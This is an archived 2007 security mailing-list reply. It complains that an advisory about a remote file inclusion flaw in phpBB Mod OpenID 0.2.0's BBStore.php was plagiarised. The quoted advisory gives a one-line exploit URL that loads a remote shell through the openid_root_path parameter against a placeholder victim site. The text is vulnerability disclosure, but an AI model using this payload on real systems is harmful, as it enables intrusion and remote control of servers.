Pantek Library

Hosting Provided By

CybrHost

High Speed Hosting

Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

From: str0ke <str0ke(at)milw0rm.com>
Date: Mon Oct 01 2007 - 14:15:23 EDT

Seph1roth likes to cut and paste.

original author = xoron.

link: http://www.milw0rm.com/exploits/4471

/str0ke

h3llcode@hotmail.it wrote:
> +++++++++++++++++++++++++++++++++++++++++++++++++++
> +
> + phpBB Mod OpenID 0.2.0 BBStore.php RFI
> + Risk: High
> + Found by Seph1roth
> + Site: http://blackroots.it
> +
> +++++++++++++++++++++++++++++++++++++++++++++++++++
>
> + Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846
>
> + Exploit:
> http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
>
>
Received on Mon Oct 1 17:22:11 2007

This message: [ Message body ]
Next message: Luigi Auriemma: "Unexploitable buffer-overflow in America's Army 2.8.2 through PB"
Previous message: security(at)mandriva.com: "[ MDKSA-2007:191 ] - Updated libsndfile packages fix vulnerability"
In reply to: h3llcode(at)hotmail.it: "phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:18:46 EDT

Contact Us Legal Notices Order Services Online
Pantek Home Privacy Policy IT news Site Map Pantek Library